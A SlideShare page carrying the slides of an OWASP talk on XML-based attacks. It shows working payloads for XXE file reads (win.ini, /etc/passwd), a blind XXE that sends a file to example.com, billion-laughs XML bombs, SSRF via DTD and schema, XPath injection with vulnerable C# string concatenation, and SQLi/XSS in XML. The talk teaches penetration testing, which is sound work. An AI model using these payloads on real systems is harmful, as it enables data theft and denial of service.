SlideShare a Scribd company logo

[Bucharest] XML Based Attacks

OWASP EEE
OWASP EEE

XML Based Attacks. Daniel Tomescu

Internet
1 of 25
Download to read offline
XML Based Attacks Daniel Tomescu 1
Work and education:  Pentester @ KPMG Romania  Moderator @ Romanian Security Team  Student @ Master of Information Management and Security, UPB Hint: We’re hiring! My interests:  Web/mobile application penetration tests  Internal network penetration tests  Curious about mobile and embedded devices  Bug bounty hunter About me 2
Pentest 101 Input: Our Payload admin’+or+‘1’=‘1’--+ Process: What we are testing Login page Output: (Un)expected result Authentication bypass 3
Roadmap 1 • XML in a few words 2 • Common vulnerabilities 3 • DTD Attacks 4 • XML Schema Attacks 5 • Xpath Injection 6 • Demo + Q & A 4
XML Usage • Web apps - XML-RPC; - SOAP; - RSS; • Documents - PDFs; - Office suite; - eBooks; • Mobile apps • Content management 5
XML Family • Lots of components • Complex structure • Many parsing stages • Parsing errors • Security vulnerabilities? 6
Common vulnerabilities (1) SQL Injection Classic example: http://target.com/login.php?user=admin&pass=a’+or+’1’=‘1 Equivalent XML Payload: <?xml version="1.0" encoding="UTF-8"?> <root> <user>admin</user> <pass>a’ or ’1’=‘1</pass> </root> 7
Common vulnerabilities (2) Cross-Site Scripting Classic example: http://example.com/search.php?query=a‛><script>alert(‚123‛)</script> Equivalent XML Payload: <?xml version="1.0" encoding="UTF-8"?> <root> <query>a‛%3E%3Cscript%3Ealert(‚123‛)%3C/script%3E</query> </root> 8
About DTDs Notes.xml <?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE note SYSTEM "Notes.dtd"> <note> <to>Tove</to> <from>Jani</from> <heading>Reminder</heading> <body>Don't forget me this weekend!</body> </note> Notes.dtd <!DOCTYPE note [ <!ELEMENT note (to,from,heading,body)> <!ELEMENT to (#PCDATA)> <!ELEMENT from (#PCDATA)> <!ELEMENT heading (#PCDATA)> <!ELEMENT body (#PCDATA)> ]> 9
DTDs : XXE Attacks (1) Request containing an external entity <?xml version="1.0" encoding="utf-8"?> <!DOCTYPE updateProfile [ <!ENTITY file SYSTEM "file:///c:/windows/win.ini"> ]> <updateProfile> <firstname>Joe</firstname> <lastname>&file;</lastname> </updateProfile> 10
DTDs : XXE Attacks (2) Blind XXE Attack <?xml version="1.0" encoding="utf-8"?> <!DOCTYPE updateProfile [ <!ENTITY % file SYSTEM "file:///c:/windows/win.ini"> <!ENTITY send SYSTEM 'http://example.com/?%file;'> ]> <updateProfile> <firstname>Joe</firstname> <lastname>&send;</lastname> </updateProfile> 11
DTDs : Denial of Service (1) Billion Laughs Attack / XML Bomb <?xml version="1.0" encoding="utf-8"?> <!DOCTYPE lolz [ <!ENTITY lol "lol"> <!ENTITY lol1 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;"> <!ENTITY lol2 "&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;"> <!ENTITY lol3 "&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;"> <!ENTITY lol4 "&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;"> <!ENTITY lol5 "&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;"> <!ENTITY lol6 "&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;"> <!ENTITY lol7 "&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;"> <!ENTITY lol8 "&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;"> <!ENTITY lol9 "&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;"> ]> <lolz>&lol9;</lolz> 12
XML Bomb variations <?xml version="1.0"?> <!DOCTYPE lolz [ <!ENTITY lol1 "&lol2;"> <!ENTITY lol2 "&lol1;"> ]> <lolz>&lol1;</lolz> <?xml version="1.0"?> <!DOCTYPE kaboom [ <!ENTITY a "aaaaaaaaaaaaaaaaaa..."> ]> <boom>&a;&a;&a;&a;&a;&a;&a;&a;&a;...</boom> .NET Code fix for XML Bombs XmlReaderSettings settings = new XmlReaderSettings(); settings.ProhibitDtd = false; settings.MaxCharactersFromEntities = 1024; XmlReader reader = XmlReader.Create(stream, settings); 13 DTDs : Denial of Service (2)
DTDs : SSRF Attacks (1) Server Side Request Forgery attack example: <?xml version="1.0" encoding="utf-8"?> <!DOCTYPE updateProfile [ <!ENTITY ssrf SYSTEM 'http://10.0.0.2/users.php?delete=all'> ]> <updateProfile> <firstname>Joe</firstname> <lastname>&ssrf;</lastname> </updateProfile> 14
DTDs : SSRF Attacks (2) 15
XML Schema Notes.xml <?xml version="1.0" encoding="UTF-8"?> <note xmlns="http://www.w3schools.com" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation=‚Notes.xsd"> > <to>Tove</to> <from>Jani</from> <heading>Reminder</heading> <body>Don't forget me this weekend!</body> </note> Notes.xsd <?xml version="1.0"?> <xs:schema xmlns:xs="http://www.w3.org/2001/XMLSchema"> <xs:element name="note"> <xs:complexType> <xs:sequence> <xs:element name="to" type="xs:string"/> <xs:element name="from" type="xs:string"/> <xs:element name="heading" type="xs:string"/> <xs:element name="body" type="xs:string"/> </xs:sequence> </xs:complexType> </xs:element> </xs:schema> 16
XML Schema SSRF Server Side Request Forgery attack example: <?xml version="1.0" encoding="utf-8"?> <roottag xmlns="http://10.0.0.1/users.php?delete=all" xmlns:secondaryns="http://10.0.0.2/users.php?delete=all" xmlns:xsi="http://10.0.0.3/users.php?delete=all" xsi:schemaLocation="http://10.0.0.4/users.php?delete=all"> <secondaryns:s> Hello! </secondaryns:s> </roottag> 17
XML Schema Poisoning attack <?xml version="1.0" encoding="utf-8"?> <xs:schema xmlns:xs="http://www.w3.org/2001/XMLSchema"> <xs:element name="note"> <xs:complexType> <xs:sequence> <xs:element name="to" type="xs:string"/> <xs:element name="from" type="xs:string"/> <xs:element name="heading" type="xs:string"/> <xs:element name="body" type="xs:string"/> </xs:sequence> </xs:complexType> </xs:element> </xs:schema> 18
XML XPath Notes.xml <?xml version="1.0" encoding="UTF-8"?> <bookstore> <book category="COOKING"> <title lang="it">Everyday Italian</title> <author>Giada De Laurentiis</author> <year>2005</year> <price>30.00</price> </book> <book category="CHILDREN"> <title lang="en">Harry Potter</title> <author>J K. Rowling</author> <year>2005</year> <price>19.99</price> </book> </bookstore> XPath expressions /bookstore/book[1] /bookstore/book[price>25.00]/title //title[@lang='en'] /bookstore/book[last()] 19
XPath Injection employees.xml <?xml version="1.0" encoding="utf-8"?> <Employees> <Employee ID="1"> <Name>Mike</Name> <UserName>Mike07</UserName> <Password>TopSecret</Password> <Type>Admin</Type> </Employee> </Employees> Payload Username: Mike07 Password: oops' or 'a'='a Result - FindUserXPath becomes //Employee[UserName/text()='Mike07' And Password/text()='oops' or 'a'='a'] C#: String FindUserXPath; FindUserXPath = "//Employee[UserName/text()='" + Request("Username") + "' And Password/text()='" + Request("Password") + "']"; 20
Content-Type header (1) HTTP Request: POST /update.php HTTP/1.1 Host: target.com Accept: application/json Content-Type: application/json Content-Length: 38 {"search":"name","value":‚val"} HTTP Response: HTTP/1.1 200 OK Content-Type: application/json Content-Length: 43 {"error": "no results for name val"} HTTP Request: POST /update.php HTTP/1.1 Host: target.com Accept: application/json Content-Type: application/xml Content-Length: 112 <?xml version="1.0" encoding="UTF-8" ?> <root> <search>name</search> <value>val</value> </root> HTTP Response: HTTP/1.1 200 OK Content-Type: application/json Content-Length: 43 {"error": "no results for name val"} 21
HTTP Request: POST /update.php HTTP/1.1 Host: target.com Accept: application/json Content-Type: application/xml Content-Length: 228 <?xml version="1.0" encoding="UTF-8" ?> <!DOCTYPE xxe [ <!ENTITY xxe SYSTEM "file:///etc/passwd" > ]> <root> <search>name</search> <value>&xxe;</value> </root> HTTP Response: HTTP/1.1 200 OK Content-Type: application/json Content-Length: 2467 {"error": "no results for name root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/bin/sh bin:x:2:2:bin:/bin:/bin/sh sys:x:3:3:sys:/dev:/bin/sh sync:x:4:65534:sync:/bin:/bin/sync.... 22 Content-Type header (2)
Cross your fingers! 23
Questions? 24
Contact: mail@daniel-tomescu.com dtomescu@kpmg.com Thank you!

Recommended

Email keeps getting us pwned v1.1
Email keeps getting us pwned v1.1Email keeps getting us pwned v1.1
Email keeps getting us pwned v1.1Michael Gough
 
Security Code Review 101
Security Code Review 101Security Code Review 101
Security Code Review 101Paul Ionescu
 
Email keeps getting us pwned v1.0
Email keeps getting us pwned v1.0Email keeps getting us pwned v1.0
Email keeps getting us pwned v1.0Michael Gough
 
Cred stealing emails bsides austin_2018 v1.0
Cred stealing emails bsides austin_2018 v1.0Cred stealing emails bsides austin_2018 v1.0
Cred stealing emails bsides austin_2018 v1.0Michael Gough
 
Email keeps getting us pwned - Avoiding Ransomware and malware
Email keeps getting us pwned - Avoiding Ransomware and malwareEmail keeps getting us pwned - Avoiding Ransomware and malware
Email keeps getting us pwned - Avoiding Ransomware and malwareMichael Gough
 
Domino Security - not knowing is not an option (2016 edition)
Domino Security - not knowing is not an option (2016 edition)Domino Security - not knowing is not an option (2016 edition)
Domino Security - not knowing is not an option (2016 edition)Darren Duke
 
DIR ISF - Email keeps getting us pwned v1.1
DIR ISF - Email keeps getting us pwned v1.1DIR ISF - Email keeps getting us pwned v1.1
DIR ISF - Email keeps getting us pwned v1.1Michael Gough
 
What can you do about ransomware
What can you do about ransomwareWhat can you do about ransomware
What can you do about ransomwareMichael Gough
 

Recommended

Email keeps getting us pwned v1.1
Email keeps getting us pwned v1.1Email keeps getting us pwned v1.1
Email keeps getting us pwned v1.1Michael Gough
 
Security Code Review 101
Security Code Review 101Security Code Review 101
Security Code Review 101Paul Ionescu
 
Email keeps getting us pwned v1.0
Email keeps getting us pwned v1.0Email keeps getting us pwned v1.0
Email keeps getting us pwned v1.0Michael Gough
 
Cred stealing emails bsides austin_2018 v1.0
Cred stealing emails bsides austin_2018 v1.0Cred stealing emails bsides austin_2018 v1.0
Cred stealing emails bsides austin_2018 v1.0Michael Gough
 
Email keeps getting us pwned - Avoiding Ransomware and malware
Email keeps getting us pwned - Avoiding Ransomware and malwareEmail keeps getting us pwned - Avoiding Ransomware and malware
Email keeps getting us pwned - Avoiding Ransomware and malwareMichael Gough
 
Domino Security - not knowing is not an option (2016 edition)
Domino Security - not knowing is not an option (2016 edition)Domino Security - not knowing is not an option (2016 edition)
Domino Security - not knowing is not an option (2016 edition)Darren Duke
 
DIR ISF - Email keeps getting us pwned v1.1
DIR ISF - Email keeps getting us pwned v1.1DIR ISF - Email keeps getting us pwned v1.1
DIR ISF - Email keeps getting us pwned v1.1Michael Gough
 
What can you do about ransomware
What can you do about ransomwareWhat can you do about ransomware
What can you do about ransomwareMichael Gough
 
[Russia] Give me a stable input
[Russia] Give me a stable input[Russia] Give me a stable input
[Russia] Give me a stable inputOWASP EEE
 
Dia da Música
Dia da MúsicaDia da Música
Dia da MúsicaPaulo Antunes
 
[Austria] Security by Design
[Austria] Security by Design[Austria] Security by Design
[Austria] Security by DesignOWASP EEE
 
[Lithuania] I am the cavalry
[Lithuania] I am the cavalry[Lithuania] I am the cavalry
[Lithuania] I am the cavalryOWASP EEE
 
[Lithuania] Introduction to threat modeling
[Lithuania] Introduction to threat modeling[Lithuania] Introduction to threat modeling
[Lithuania] Introduction to threat modelingOWASP EEE
 
[Cluj] CSP (Content Security Policy)
[Cluj] CSP (Content Security Policy)[Cluj] CSP (Content Security Policy)
[Cluj] CSP (Content Security Policy)OWASP EEE
 
[Lithuania] DigiCerts and DigiID to Enterprise apps
[Lithuania] DigiCerts and DigiID to Enterprise apps[Lithuania] DigiCerts and DigiID to Enterprise apps
[Lithuania] DigiCerts and DigiID to Enterprise appsOWASP EEE
 
RESUME OF MAHFUZUR RAHMAN_Oct' 15
RESUME OF MAHFUZUR RAHMAN_Oct' 15RESUME OF MAHFUZUR RAHMAN_Oct' 15
RESUME OF MAHFUZUR RAHMAN_Oct' 15Mahfuzur Rahman
 
[Russia] Node.JS - Architecture and Vulnerabilities
[Russia] Node.JS - Architecture and Vulnerabilities[Russia] Node.JS - Architecture and Vulnerabilities
[Russia] Node.JS - Architecture and VulnerabilitiesOWASP EEE
 
[Poland] It's only about frontend
[Poland] It's only about frontend[Poland] It's only about frontend
[Poland] It's only about frontendOWASP EEE
 
[Bucharest] Catching up with today's malicious actors
[Bucharest] Catching up with today's malicious actors[Bucharest] Catching up with today's malicious actors
[Bucharest] Catching up with today's malicious actorsOWASP EEE
 
[Russia] MySQL OOB injections
[Russia] MySQL OOB injections[Russia] MySQL OOB injections
[Russia] MySQL OOB injectionsOWASP EEE
 
BITM3730Week5.pptx
BITM3730Week5.pptxBITM3730Week5.pptx
BITM3730Week5.pptxMattMarino13
 
Java Web Services
Java Web ServicesJava Web Services
Java Web ServicesJussi Pohjolainen
 
Recent Trends in Cyber Security
Recent Trends in Cyber SecurityRecent Trends in Cyber Security
Recent Trends in Cyber SecurityAyoma Wijethunga
 
Modern Web Technologies — Jerusalem Web Professionals, January 2011
Modern Web Technologies — Jerusalem Web Professionals, January 2011Modern Web Technologies — Jerusalem Web Professionals, January 2011
Modern Web Technologies — Jerusalem Web Professionals, January 2011Reuven Lerner
 
Modern Web technologies (and why you should care): Megacomm, Jerusalem, Febru...
Modern Web technologies (and why you should care): Megacomm, Jerusalem, Febru...Modern Web technologies (and why you should care): Megacomm, Jerusalem, Febru...
Modern Web technologies (and why you should care): Megacomm, Jerusalem, Febru...Reuven Lerner
 
Hacking Oracle From Web Apps 1 9
Hacking Oracle From Web Apps 1 9Hacking Oracle From Web Apps 1 9
Hacking Oracle From Web Apps 1 9sumsid1234
 
HTML5 and Joomla! 2.5 Template
HTML5 and Joomla! 2.5 TemplateHTML5 and Joomla! 2.5 Template
HTML5 and Joomla! 2.5 TemplateMarvelic Engine Co., Ltd.
 
Being HAPI! Reverse Proxying on Purpose
Being HAPI! Reverse Proxying on PurposeBeing HAPI! Reverse Proxying on Purpose
Being HAPI! Reverse Proxying on PurposeAman Kohli
 
Jmp107 Web Services
Jmp107 Web ServicesJmp107 Web Services
Jmp107 Web Servicesdominion
 
An Introduction to Solr
An Introduction to SolrAn Introduction to Solr
An Introduction to Solrtomhill
 

More Related Content

Viewers also liked

[Russia] Give me a stable input
[Russia] Give me a stable input[Russia] Give me a stable input
[Russia] Give me a stable inputOWASP EEE
 
[Austria] Security by Design
[Austria] Security by Design[Austria] Security by Design
[Austria] Security by DesignOWASP EEE
 
[Lithuania] I am the cavalry
[Lithuania] I am the cavalry[Lithuania] I am the cavalry
[Lithuania] I am the cavalryOWASP EEE
 
[Lithuania] Introduction to threat modeling
[Lithuania] Introduction to threat modeling[Lithuania] Introduction to threat modeling
[Lithuania] Introduction to threat modelingOWASP EEE
 
[Cluj] CSP (Content Security Policy)
[Cluj] CSP (Content Security Policy)[Cluj] CSP (Content Security Policy)
[Cluj] CSP (Content Security Policy)OWASP EEE
 
[Lithuania] DigiCerts and DigiID to Enterprise apps
[Lithuania] DigiCerts and DigiID to Enterprise apps[Lithuania] DigiCerts and DigiID to Enterprise apps
[Lithuania] DigiCerts and DigiID to Enterprise appsOWASP EEE
 
RESUME OF MAHFUZUR RAHMAN_Oct' 15
RESUME OF MAHFUZUR RAHMAN_Oct' 15RESUME OF MAHFUZUR RAHMAN_Oct' 15
RESUME OF MAHFUZUR RAHMAN_Oct' 15Mahfuzur Rahman
 
[Russia] Node.JS - Architecture and Vulnerabilities
[Russia] Node.JS - Architecture and Vulnerabilities[Russia] Node.JS - Architecture and Vulnerabilities
[Russia] Node.JS - Architecture and VulnerabilitiesOWASP EEE
 
[Poland] It's only about frontend
[Poland] It's only about frontend[Poland] It's only about frontend
[Poland] It's only about frontendOWASP EEE
 
[Bucharest] Catching up with today's malicious actors
[Bucharest] Catching up with today's malicious actors[Bucharest] Catching up with today's malicious actors
[Bucharest] Catching up with today's malicious actorsOWASP EEE
 
[Russia] MySQL OOB injections
[Russia] MySQL OOB injections[Russia] MySQL OOB injections
[Russia] MySQL OOB injectionsOWASP EEE
 

Viewers also liked (12)

[Russia] Give me a stable input
[Russia] Give me a stable input[Russia] Give me a stable input
[Russia] Give me a stable input
 
Dia da Música
Dia da MúsicaDia da Música
Dia da Música
 
[Austria] Security by Design
[Austria] Security by Design[Austria] Security by Design
[Austria] Security by Design
 
[Lithuania] I am the cavalry
[Lithuania] I am the cavalry[Lithuania] I am the cavalry
[Lithuania] I am the cavalry
 
[Lithuania] Introduction to threat modeling
[Lithuania] Introduction to threat modeling[Lithuania] Introduction to threat modeling
[Lithuania] Introduction to threat modeling
 
[Cluj] CSP (Content Security Policy)
[Cluj] CSP (Content Security Policy)[Cluj] CSP (Content Security Policy)
[Cluj] CSP (Content Security Policy)
 
[Lithuania] DigiCerts and DigiID to Enterprise apps
[Lithuania] DigiCerts and DigiID to Enterprise apps[Lithuania] DigiCerts and DigiID to Enterprise apps
[Lithuania] DigiCerts and DigiID to Enterprise apps
 
RESUME OF MAHFUZUR RAHMAN_Oct' 15
RESUME OF MAHFUZUR RAHMAN_Oct' 15RESUME OF MAHFUZUR RAHMAN_Oct' 15
RESUME OF MAHFUZUR RAHMAN_Oct' 15
 
[Russia] Node.JS - Architecture and Vulnerabilities
[Russia] Node.JS - Architecture and Vulnerabilities[Russia] Node.JS - Architecture and Vulnerabilities
[Russia] Node.JS - Architecture and Vulnerabilities
 
[Poland] It's only about frontend
[Poland] It's only about frontend[Poland] It's only about frontend
[Poland] It's only about frontend
 
[Bucharest] Catching up with today's malicious actors
[Bucharest] Catching up with today's malicious actors[Bucharest] Catching up with today's malicious actors
[Bucharest] Catching up with today's malicious actors
 
[Russia] MySQL OOB injections
[Russia] MySQL OOB injections[Russia] MySQL OOB injections
[Russia] MySQL OOB injections
 

Similar to [Bucharest] XML Based Attacks

BITM3730Week5.pptx
BITM3730Week5.pptxBITM3730Week5.pptx
BITM3730Week5.pptxMattMarino13
 
Recent Trends in Cyber Security
Recent Trends in Cyber SecurityRecent Trends in Cyber Security
Recent Trends in Cyber SecurityAyoma Wijethunga
 
Modern Web Technologies — Jerusalem Web Professionals, January 2011
Modern Web Technologies — Jerusalem Web Professionals, January 2011Modern Web Technologies — Jerusalem Web Professionals, January 2011
Modern Web Technologies — Jerusalem Web Professionals, January 2011Reuven Lerner
 
Modern Web technologies (and why you should care): Megacomm, Jerusalem, Febru...
Modern Web technologies (and why you should care): Megacomm, Jerusalem, Febru...Modern Web technologies (and why you should care): Megacomm, Jerusalem, Febru...
Modern Web technologies (and why you should care): Megacomm, Jerusalem, Febru...Reuven Lerner
 
Hacking Oracle From Web Apps 1 9
Hacking Oracle From Web Apps 1 9Hacking Oracle From Web Apps 1 9
Hacking Oracle From Web Apps 1 9sumsid1234
 
Being HAPI! Reverse Proxying on Purpose
Being HAPI! Reverse Proxying on PurposeBeing HAPI! Reverse Proxying on Purpose
Being HAPI! Reverse Proxying on PurposeAman Kohli
 
Jmp107 Web Services
Jmp107 Web ServicesJmp107 Web Services
Jmp107 Web Servicesdominion
 
An Introduction to Solr
An Introduction to SolrAn Introduction to Solr
An Introduction to Solrtomhill
 
XXE: How to become a Jedi
XXE: How to become a JediXXE: How to become a Jedi
XXE: How to become a JediYaroslav Babin
 
Introduction to xml
Introduction to xmlIntroduction to xml
Introduction to xmlGtu Booker
 
Top Ten Java Defense for Web Applications v2
Top Ten Java Defense for Web Applications v2Top Ten Java Defense for Web Applications v2
Top Ten Java Defense for Web Applications v2Jim Manico
 
HTML5: The Next Internet Goldrush
HTML5: The Next Internet GoldrushHTML5: The Next Internet Goldrush
HTML5: The Next Internet GoldrushPeter Lubbers
 
Common PhoneGap Gotchas (#PGDay EU 2016)
Common PhoneGap Gotchas (#PGDay EU 2016)Common PhoneGap Gotchas (#PGDay EU 2016)
Common PhoneGap Gotchas (#PGDay EU 2016)Kerri Shotts
 
Troubleshooting: The Two Laws - IXIASOFT User Conference 2016
Troubleshooting: The Two Laws - IXIASOFT User Conference 2016Troubleshooting: The Two Laws - IXIASOFT User Conference 2016
Troubleshooting: The Two Laws - IXIASOFT User Conference 2016IXIASOFT
 
Known XML Vulnerabilities Are Still a Threat to Popular Parsers ! & Open Sour...
Known XML Vulnerabilities Are Still a Threat to Popular Parsers ! & Open Sour...Known XML Vulnerabilities Are Still a Threat to Popular Parsers ! & Open Sour...
Known XML Vulnerabilities Are Still a Threat to Popular Parsers ! & Open Sour...Lionel Briand
 

Similar to [Bucharest] XML Based Attacks (20)

BITM3730Week5.pptx
BITM3730Week5.pptxBITM3730Week5.pptx
BITM3730Week5.pptx
 
Java Web Services
Java Web ServicesJava Web Services
Java Web Services
 
Recent Trends in Cyber Security
Recent Trends in Cyber SecurityRecent Trends in Cyber Security
Recent Trends in Cyber Security
 
Modern Web Technologies — Jerusalem Web Professionals, January 2011
Modern Web Technologies — Jerusalem Web Professionals, January 2011Modern Web Technologies — Jerusalem Web Professionals, January 2011
Modern Web Technologies — Jerusalem Web Professionals, January 2011
 
Modern Web technologies (and why you should care): Megacomm, Jerusalem, Febru...
Modern Web technologies (and why you should care): Megacomm, Jerusalem, Febru...Modern Web technologies (and why you should care): Megacomm, Jerusalem, Febru...
Modern Web technologies (and why you should care): Megacomm, Jerusalem, Febru...
 
Hacking Oracle From Web Apps 1 9
Hacking Oracle From Web Apps 1 9Hacking Oracle From Web Apps 1 9
Hacking Oracle From Web Apps 1 9
 
HTML5 and Joomla! 2.5 Template
HTML5 and Joomla! 2.5 TemplateHTML5 and Joomla! 2.5 Template
HTML5 and Joomla! 2.5 Template
 
Being HAPI! Reverse Proxying on Purpose
Being HAPI! Reverse Proxying on PurposeBeing HAPI! Reverse Proxying on Purpose
Being HAPI! Reverse Proxying on Purpose
 
Jmp107 Web Services
Jmp107 Web ServicesJmp107 Web Services
Jmp107 Web Services
 
An Introduction to Solr
An Introduction to SolrAn Introduction to Solr
An Introduction to Solr
 
XXE: How to become a Jedi
XXE: How to become a JediXXE: How to become a Jedi
XXE: How to become a Jedi
 
Ajax xml json
Ajax xml jsonAjax xml json
Ajax xml json
 
Secure pl-sql-coding
Secure pl-sql-codingSecure pl-sql-coding
Secure pl-sql-coding
 
Introduction to xml
Introduction to xmlIntroduction to xml
Introduction to xml
 
soa
soasoa
soa
 
Top Ten Java Defense for Web Applications v2
Top Ten Java Defense for Web Applications v2Top Ten Java Defense for Web Applications v2
Top Ten Java Defense for Web Applications v2
 
HTML5: The Next Internet Goldrush
HTML5: The Next Internet GoldrushHTML5: The Next Internet Goldrush
HTML5: The Next Internet Goldrush
 
Common PhoneGap Gotchas (#PGDay EU 2016)
Common PhoneGap Gotchas (#PGDay EU 2016)Common PhoneGap Gotchas (#PGDay EU 2016)
Common PhoneGap Gotchas (#PGDay EU 2016)
 
Troubleshooting: The Two Laws - IXIASOFT User Conference 2016
Troubleshooting: The Two Laws - IXIASOFT User Conference 2016Troubleshooting: The Two Laws - IXIASOFT User Conference 2016
Troubleshooting: The Two Laws - IXIASOFT User Conference 2016
 
Known XML Vulnerabilities Are Still a Threat to Popular Parsers ! & Open Sour...
Known XML Vulnerabilities Are Still a Threat to Popular Parsers ! & Open Sour...Known XML Vulnerabilities Are Still a Threat to Popular Parsers ! & Open Sour...
Known XML Vulnerabilities Are Still a Threat to Popular Parsers ! & Open Sour...
 

More from OWASP EEE

[Austria] ZigBee exploited
[Austria] ZigBee exploited[Austria] ZigBee exploited
[Austria] ZigBee exploitedOWASP EEE
 
[Austria] How we hacked an online mobile banking Trojan
[Austria] How we hacked an online mobile banking Trojan[Austria] How we hacked an online mobile banking Trojan
[Austria] How we hacked an online mobile banking TrojanOWASP EEE
 
[Poland] SecOps live cooking with OWASP appsec tools
[Poland] SecOps live cooking with OWASP appsec tools[Poland] SecOps live cooking with OWASP appsec tools
[Poland] SecOps live cooking with OWASP appsec toolsOWASP EEE
 
[Cluj] Turn SSL ON
[Cluj] Turn SSL ON[Cluj] Turn SSL ON
[Cluj] Turn SSL ONOWASP EEE
 
[Cluj] Information Security Through Gamification
[Cluj] Information Security Through Gamification[Cluj] Information Security Through Gamification
[Cluj] Information Security Through GamificationOWASP EEE
 
[Cluj] A distributed - collaborative client certification system
[Cluj] A distributed - collaborative client certification system[Cluj] A distributed - collaborative client certification system
[Cluj] A distributed - collaborative client certification systemOWASP EEE
 
[Russia] Bugs -> max, time &lt;= T
[Russia] Bugs -> max, time &lt;= T[Russia] Bugs -> max, time &lt;= T
[Russia] Bugs -> max, time &lt;= TOWASP EEE
 
[Russia] Building better product security
[Russia] Building better product security[Russia] Building better product security
[Russia] Building better product securityOWASP EEE
 
[Lithuania] Cross-site request forgery: ways to exploit, ways to prevent
[Lithuania] Cross-site request forgery: ways to exploit, ways to prevent[Lithuania] Cross-site request forgery: ways to exploit, ways to prevent
[Lithuania] Cross-site request forgery: ways to exploit, ways to preventOWASP EEE
 
[Hungary] I play Jack of Information Disclosure
[Hungary] I play Jack of Information Disclosure[Hungary] I play Jack of Information Disclosure
[Hungary] I play Jack of Information DisclosureOWASP EEE
 
[Hungary] Survival is not mandatory. The air force one has departured are you...
[Hungary] Survival is not mandatory. The air force one has departured are you...[Hungary] Survival is not mandatory. The air force one has departured are you...
[Hungary] Survival is not mandatory. The air force one has departured are you...OWASP EEE
 
[Hungary] Secure Software? Start appreciating your developers!
[Hungary] Secure Software? Start appreciating your developers![Hungary] Secure Software? Start appreciating your developers!
[Hungary] Secure Software? Start appreciating your developers!OWASP EEE
 
[Bucharest] Your intents are dirty, droid!
[Bucharest] Your intents are dirty, droid![Bucharest] Your intents are dirty, droid!
[Bucharest] Your intents are dirty, droid!OWASP EEE
 
[Bucharest] #DontTrustTheDarkSide
[Bucharest] #DontTrustTheDarkSide[Bucharest] #DontTrustTheDarkSide
[Bucharest] #DontTrustTheDarkSideOWASP EEE
 
[Bucharest] From SCADA to IoT Cyber Security
[Bucharest] From SCADA to IoT Cyber Security[Bucharest] From SCADA to IoT Cyber Security
[Bucharest] From SCADA to IoT Cyber SecurityOWASP EEE
 
[Bucharest] Reversing the Apple Sandbox
[Bucharest] Reversing the Apple Sandbox[Bucharest] Reversing the Apple Sandbox
[Bucharest] Reversing the Apple SandboxOWASP EEE
 
[Bucharest] Attack is easy, let's talk defence
[Bucharest] Attack is easy, let's talk defence[Bucharest] Attack is easy, let's talk defence
[Bucharest] Attack is easy, let's talk defenceOWASP EEE
 

More from OWASP EEE (17)

[Austria] ZigBee exploited
[Austria] ZigBee exploited[Austria] ZigBee exploited
[Austria] ZigBee exploited
 
[Austria] How we hacked an online mobile banking Trojan
[Austria] How we hacked an online mobile banking Trojan[Austria] How we hacked an online mobile banking Trojan
[Austria] How we hacked an online mobile banking Trojan
 
[Poland] SecOps live cooking with OWASP appsec tools
[Poland] SecOps live cooking with OWASP appsec tools[Poland] SecOps live cooking with OWASP appsec tools
[Poland] SecOps live cooking with OWASP appsec tools
 
[Cluj] Turn SSL ON
[Cluj] Turn SSL ON[Cluj] Turn SSL ON
[Cluj] Turn SSL ON
 
[Cluj] Information Security Through Gamification
[Cluj] Information Security Through Gamification[Cluj] Information Security Through Gamification
[Cluj] Information Security Through Gamification
 
[Cluj] A distributed - collaborative client certification system
[Cluj] A distributed - collaborative client certification system[Cluj] A distributed - collaborative client certification system
[Cluj] A distributed - collaborative client certification system
 
[Russia] Bugs -> max, time &lt;= T
[Russia] Bugs -> max, time &lt;= T[Russia] Bugs -> max, time &lt;= T
[Russia] Bugs -> max, time &lt;= T
 
[Russia] Building better product security
[Russia] Building better product security[Russia] Building better product security
[Russia] Building better product security
 
[Lithuania] Cross-site request forgery: ways to exploit, ways to prevent
[Lithuania] Cross-site request forgery: ways to exploit, ways to prevent[Lithuania] Cross-site request forgery: ways to exploit, ways to prevent
[Lithuania] Cross-site request forgery: ways to exploit, ways to prevent
 
[Hungary] I play Jack of Information Disclosure
[Hungary] I play Jack of Information Disclosure[Hungary] I play Jack of Information Disclosure
[Hungary] I play Jack of Information Disclosure
 
[Hungary] Survival is not mandatory. The air force one has departured are you...
[Hungary] Survival is not mandatory. The air force one has departured are you...[Hungary] Survival is not mandatory. The air force one has departured are you...
[Hungary] Survival is not mandatory. The air force one has departured are you...
 
[Hungary] Secure Software? Start appreciating your developers!
[Hungary] Secure Software? Start appreciating your developers![Hungary] Secure Software? Start appreciating your developers!
[Hungary] Secure Software? Start appreciating your developers!
 
[Bucharest] Your intents are dirty, droid!
[Bucharest] Your intents are dirty, droid![Bucharest] Your intents are dirty, droid!
[Bucharest] Your intents are dirty, droid!
 
[Bucharest] #DontTrustTheDarkSide
[Bucharest] #DontTrustTheDarkSide[Bucharest] #DontTrustTheDarkSide
[Bucharest] #DontTrustTheDarkSide
 
[Bucharest] From SCADA to IoT Cyber Security
[Bucharest] From SCADA to IoT Cyber Security[Bucharest] From SCADA to IoT Cyber Security
[Bucharest] From SCADA to IoT Cyber Security
 
[Bucharest] Reversing the Apple Sandbox
[Bucharest] Reversing the Apple Sandbox[Bucharest] Reversing the Apple Sandbox
[Bucharest] Reversing the Apple Sandbox
 
[Bucharest] Attack is easy, let's talk defence
[Bucharest] Attack is easy, let's talk defence[Bucharest] Attack is easy, let's talk defence
[Bucharest] Attack is easy, let's talk defence
 

Recently uploaded

Call Girls In Mumbai Central Mumbai ❤️ 9920874524 👈 Cash on Delivery
